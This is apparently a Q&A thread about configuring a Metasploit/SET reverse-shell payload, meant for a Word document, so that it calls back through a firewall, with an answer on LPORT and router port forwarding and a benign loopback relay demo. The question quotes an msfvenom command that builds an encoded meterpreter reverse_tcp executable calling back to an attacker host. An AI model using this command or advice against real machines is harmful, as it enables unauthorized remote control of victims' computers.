
I am trying to build a payload for inserting as obfuscated code into a Word document, which will create a listener on the attacked machine and will allow me to execute some commands (not through an .exe file as shown in tons of videos).

I am assuming: The attacked machine is behind a firewall, which blocks outgoing traffic except for port 80 and 443. Thus I want traffic of the attacked machine to be forwarded TO those ports, so I could listen and execute.

I am using the SET toolkit (in Kali), pick "social-engineering attacks" -> powershell attack vectors -> alpha-numeric shell code injector.

It prompts for LHOST, which is my public IP, forwarded to my internal IP (I am behind router).

Then it prompts for LPORT and that's it.

My understanding is LPORT = Local Port, which means the port on which I am going to accept traffic coming FROM the attacked machine. But in this case, HOW can I specify an outgoing port for the ATTACKED machine?

I'd like a meterpreter solution, if possible. I don't care if it's a powershell vector or another one, since the payload, if I understand correctly, only opens for me a possibility to listen and execute commands on the attacked machine.

On a SANS Institute cheatsheet I have found an interesting command:

msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Here it seems like LPORT is introduced into the malware file, but in this case it'll be exactly what I need: a port for outgoing traffic from the attacked machine.

schroeder
Michael
You've got quite a few misconceptions here, suggesting that you're well out of your depth. Outgoing web traffic doesn't go out via ports 80 and 443, for a start - it goes to ports 80 and 443 on some other box. You need to look at how TCP networking works - start with https://www.bleepingcomputer.com/tutorials/tcp-and-udp-ports-explained/ for a high level overview. – Matthew Aug 16 '17 at 11:19

1 Answer

You are going to have to set LPORT to two different values. LPORT on the payload should be the port you forwarded on the router (the one you can access externally). LPORT on the exploit should be a port that your attacking machine listens on, for example port 4444.

Explanation:

Since a firewall only allows port 80 and 443, you will need to forward either 80 or 443 on your router to port 4444.

For this explanation, we are going to take port 5555 as the port open on the router, and port 4444 as the port listening on the attacking computer. To deal with the firewall, you will need to use port 80 or 443 instead of port 5555.

Since you are doing this attack over the internet, and have port forwarded to your attacking machine, you are able to send data from a computer on a different network to your attacking machine. It looks something like this:

Computer on another network -> Router (port 5555) -> attacking machine (port 4444) 

So since the payload is launched from another network, the only way for it to communicate with your attacking computer is on port 5555.

The exploit / handler is running on your attacking machine which is on your own network. Port 4444 is listening for data which has been routed from an external computer, through your router, and to port 4444. For this reason, the LPORT for the exploit / handler is 4444.

Joe
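The chain described in this answer (client -> forwarded router port -> listener on the attacking machine), reproduced as an added loopback demonstration that is not part of the original answer: a "client" connects to a "relay" port (the router's forwarded port, 5555 in the answer), the relay opens its own connection to a "backend" listener (the handler's port, 4444 in the answer), and each side records the ports it actually observes. It shows the point Matthew's comment makes as well: the client's own source port is an OS-chosen ephemeral port, and the only port the client ever needs to know is the destination port it connects to. Ports here are assigned by the OS instead of 5555/4444, everything runs on 127.0.0.1, and the names `run_demo`, `relay`, `backend` are this example's own.

```python
import socket
import threading

HOST = "127.0.0.1"  # constructed demo: every role lives on loopback, nothing leaves the machine


def _pump(src, dst):
    """Copy bytes from src to dst until src closes, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _listener():
    """Bind a TCP listener on an OS-chosen loopback port and return it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, 0))
    s.listen(1)
    return s


def run_demo():
    """Run client -> relay -> backend once and return the ports each side observed."""
    backend = _listener()  # stands in for the handler (the answer's port 4444)
    relay = _listener()    # stands in for the router's forwarded port (the answer's port 5555)
    seen = {
        "backend_listen_port": backend.getsockname()[1],
        "relay_listen_port": relay.getsockname()[1],
    }

    def backend_thread():
        # The handler side: it only ever sees the relay's address, never the client's.
        conn, peer = backend.accept()
        with conn:
            seen["backend_peer_port"] = peer[1]                  # relay's ephemeral source port
            seen["backend_local_port"] = conn.getsockname()[1]  # the port it was listening on
            data = conn.recv(4096)
            conn.sendall(data.upper())  # echo back upper-cased to prove the return path works

    def relay_thread():
        # The router-forwarding side: accept on the public port, open a fresh connection inward.
        conn, _ = relay.accept()
        upstream = socket.create_connection((HOST, seen["backend_listen_port"]))
        seen["relay_source_port"] = upstream.getsockname()[1]
        t = threading.Thread(target=_pump, args=(conn, upstream))
        t.start()
        _pump(upstream, conn)
        t.join()
        conn.close()
        upstream.close()

    threads = [threading.Thread(target=backend_thread), threading.Thread(target=relay_thread)]
    for t in threads:
        t.start()

    # The client side: connects to the relay's port; its own source port is picked by the OS.
    client = socket.create_connection((HOST, seen["relay_listen_port"]))
    seen["client_source_port"] = client.getsockname()[1]
    seen["client_dest_port"] = client.getpeername()[1]
    client.sendall(b"ping")
    client.shutdown(socket.SHUT_WR)
    reply = b""
    while True:
        chunk = client.recv(4096)
        if not chunk:
            break
        reply += chunk
    client.close()
    for t in threads:
        t.join()
    backend.close()
    relay.close()
    seen["reply"] = reply
    return seen


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Reading the result: `client_dest_port` equals `relay_listen_port` (the value that belongs in the payload's LPORT in the answer's terms), `backend_local_port` equals `backend_listen_port` (the handler's LPORT), and `backend_peer_port` equals `relay_source_port`, so the listener never sees the client's source port at all. `client_source_port` matches neither listener, which is why there is no setting for an "outgoing port" on the connecting side: the OS picks it.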